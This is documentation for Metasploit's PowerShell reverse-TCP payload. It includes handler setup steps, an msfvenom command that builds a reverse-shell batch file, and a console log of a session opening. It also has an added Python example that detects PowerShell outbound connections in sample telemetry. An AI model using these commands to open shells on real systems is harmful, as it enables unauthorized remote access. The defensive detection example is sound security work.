54 lines
1.3 KiB
Markdown
## Vulnerable Application

This PowerShell payload is suitable for the following environments:

* Windows 7
* Windows Server 2012
* Windows 10

## Verification Steps

1. Do: `use exploit/multi/handler`
2. Do: `set payload cmd/windows/powershell_reverse_tcp`
3. Do: `set LHOST [IP]`
4. Do: `set LPORT [PORT]`
5. Do: `run`

## Scenarios

### Generating a batch file with msfvenom

```
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat
```

The output batch file can be executed directly on the target, or pasted as a command.

### Example usage on Windows 7 target

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000

User @ USER-PC
PS C:\Users\User> exit
[*] 192.168.0.2 - Powershell session session 1 closed.
```
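
The session above is what this payload looks like from the handler's side: a PowerShell process on the target opens an outbound TCP connection to LHOST:LPORT. The following is an added example, not part of the Metasploit module or its documentation, showing how a defender would pick that behaviour out of endpoint telemetry. It parses constructed, simplified Sysmon-style network-connection records (the field names, the allowlisted ports and the internal address ranges are all assumptions) and ranks PowerShell-initiated outbound connections by how unusual the destination port and peer are.

```python
"""Flag outbound TCP connections initiated by PowerShell processes.

Added example for this page; it is not part of the Metasploit module or
its documentation. Events are constructed, simplified Sysmon-style
network-connection records (key=value text); the field names, the
allowlisted ports and the internal address ranges are assumptions.
"""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample telemetry, not real logs. The first line mirrors the
# handler address used on this page (LHOST 192.168.0.2, LPORT 4444).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated=true DestinationIp=192.168.0.2 DestinationPort=4444",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated=true DestinationIp=10.0.0.5 DestinationPort=443",
    "Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe Initiated=true DestinationIp=10.0.0.5 DestinationPort=443",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated=false DestinationIp=10.0.0.9 DestinationPort=5985",
    "Image=C:\\Program Files\\PowerShell\\7\\pwsh.exe Initiated=true DestinationIp=203.0.113.7 DestinationPort=443",
]

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
# Assumption: HTTP(S) and WinRM are the only ports PowerShell legitimately uses here.
EXPECTED_PORTS = {80, 443, 5985, 5986}
# Assumption: RFC 1918 space is the organisation's internal range.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Key=Value pairs; a value runs until the next " Key=" or end of line.
_KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Parse 'Key=Value Key=Value ...'; values such as paths may contain spaces."""
    return dict(_KV.findall(line))


def image_name(path: str) -> str:
    """Return the lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_internal(ip: str) -> bool:
    """True if the address falls inside the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify(event: Dict[str, str]) -> Optional[str]:
    """Severity for one event, or None if it is not an outbound PowerShell connection.

    A PowerShell process opening a raw outbound socket is the core signal of a
    reverse shell like the one on this page; port and peer decide how loudly
    to alert.
    """
    if image_name(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return None
    if event.get("Initiated", "").lower() != "true":
        return None  # inbound connection (e.g. a WinRM listener), not our pattern
    port = int(event.get("DestinationPort", "0"))
    if port not in EXPECTED_PORTS:
        return "high"    # e.g. 4444: not a port PowerShell should be talking to
    if not is_internal(event.get("DestinationIp", "0.0.0.0")):
        return "medium"  # expected port, but an external peer
    return "low"         # expected port, internal peer: record, do not page


def find_powershell_outbound(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (severity, destination ip, port) for every medium/high event."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev in ("high", "medium"):
            findings.append((sev, ev["DestinationIp"], int(ev["DestinationPort"])))
    return findings


if __name__ == "__main__":
    for sev, ip, port in find_powershell_outbound(SAMPLE_EVENTS):
        print(f"{sev.upper():6} powershell -> {ip}:{port}")
```

Run directly, it reports the page-style connection to 192.168.0.2:4444 as high and the pwsh.exe connection to an external host on 443 as medium; the browser connection and the inbound WinRM event are ignored. In a real deployment the port allowlist and internal ranges come from the environment's baseline rather than the constants above.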

## Options

### LOAD_MODULES

A list of PowerShell modules (separated by commas) to download.